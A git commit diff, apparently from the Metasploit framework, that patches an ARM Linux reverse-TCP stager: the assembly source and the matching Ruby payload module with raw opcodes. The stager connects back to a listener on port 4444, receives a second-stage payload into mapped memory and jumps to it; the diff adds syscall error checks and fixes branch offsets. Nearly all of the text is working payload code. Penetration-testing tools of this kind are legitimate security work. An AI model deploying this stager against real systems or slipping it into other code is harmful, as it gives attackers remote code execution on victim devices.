Merge pull request #1 from timwr/fix-8543

tkmru · web-flow · commit 4647f3410a86 · 2017-06-16T15:30:02.000+09:00
fix mmap return cmp
diff --git a/external/source/shellcode/linux/armle/stager_sock_reverse.s b/external/source/shellcode/linux/armle/stager_sock_reverse.s
@@ -34,12 +34,16 @@ _start:
 	mov r1,#1          @ type     = SOCK_STREAM
 	mov r2,#6          @ protocol = IPPROTO_TCP
 	swi 0
+	cmp r0, #0
+	blt failed
 @ int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
     mov r12,r0         @ sockfd
 	add r7,#2          @ __NR_socket
-	add r1,pc,#144     @ *addr
+	add r1,pc,#196     @ *addr
 	mov r2,#16         @ addrlen
 	swi 0
+	cmp r0, #0
+	blt failed
 @ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
     mov r0,r12         @ sockfd
 	sub sp,#4
@@ -48,6 +52,8 @@ _start:
 	mov r2,#4          @ len
 	mov r3,#0          @ flags
 	swi 0
+	cmp r0, #0
+	blt failed
 @ round length
 	ldr r1,[sp,#0]
 	ldr r3,=0xfffff000
@@ -63,6 +69,8 @@ _start:
 	mov r4,r0          @ fd
 	mov r5,#0          @ pgoffset
 	swi 0
+	cmn r0, #1
+	beq failed
 @ recv loop
 @ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
 	add r7,#99         @ __NR_recv
@@ -78,12 +86,20 @@ loop:
 	ble last
 	mov r2,#1000       @ len
 	swi 0	
+	cmp r0, #0
+	blt failed
 	b loop
 last:
 	add r2,#1000       @ len
 	swi 0
+	cmp r0, #0
+	blt failed
 @ branch to code
 	mov pc,r1
+failed:
+	mov r7, #1
+	mov r0, #1
+	swi 0
 @ addr
 @ port: 4444 , sin_fam = 2
 .word   0x5c110002 
diff --git a/modules/payloads/stagers/linux/armle/reverse_tcp.rb b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
@@ -39,6 +39,7 @@ def initialize(info = {})
             },
           'Payload' =>
           [
+            # Generated from external/source/shellcode/linux/armle/stager_sock_reverse.s
             0xe59f70f0,          #        ldr     r7, [pc, #240]    ; set 281(0x119) to r7
             0xe3a00002,          #        mov     r0, #2
             0xe3a01001,          #        mov     r1, #1
@@ -75,8 +76,8 @@ def initialize(info = {})
             0xe1a04000,          #        mov     r4, r0
             0xe3a05000,          #        mov     r5, #0
             0xef000000,          #        svc     0x00000000        ; invoke mmap2
-            0xe3500000,          #        cmp     r0, #0
-            0xba000012,          #        blt 817c <failed>
+            0xe3700001,          #        cmn     r0, #1
+            0x0a000012,          #        beq     <failed>
             0xe2877063,          #        add     r7, r7, #99       ; set 291(0x123) to r7
             0xe1a01000,          #        mov     r1, r0
             0xe1a0000c,          #        mov     r0, ip
@@ -86,17 +87,17 @@ def initialize(info = {})
             0xe2422ffa,          #        sub     r2, r2, #1000
             0xe58d2000,          #        str     r2, [sp]
             0xe3520000,          #        cmp     r2, #0
-            0xda000002,          #        ble     80fc <last>
+            0xda000004,          #        ble     80fc <last>
             0xe3a02ffa,          #        mov     r2, #1000
             0xef000000,          #        svc     0x00000000        ; invoke recv
             0xe3500000,          #        cmp     r0, #0
             0xba000005,          #        blt     817c <failed>
-            0xeafffff7,          #        b       80dc <loop>
+            0xeafffff5,          #        b       80dc <loop>
                                  #  last:
             0xe2822ffa,          #        add     r2, r2, #1000
             0xef000000,          #        svc     0x00000000        ; invoke recv
-            0xe3500000,          #        cmp r0, #0
-            0xba000000,          #        blt 817c <failed>
+            0xe3500000,          #        cmp     r0, #0
+            0xba000000,          #        blt     817c <failed>
             0xe1a0f001,          #        mov     pc, r1
                                  #  failed:
             0xe3a07001,          #        mov r7, #1
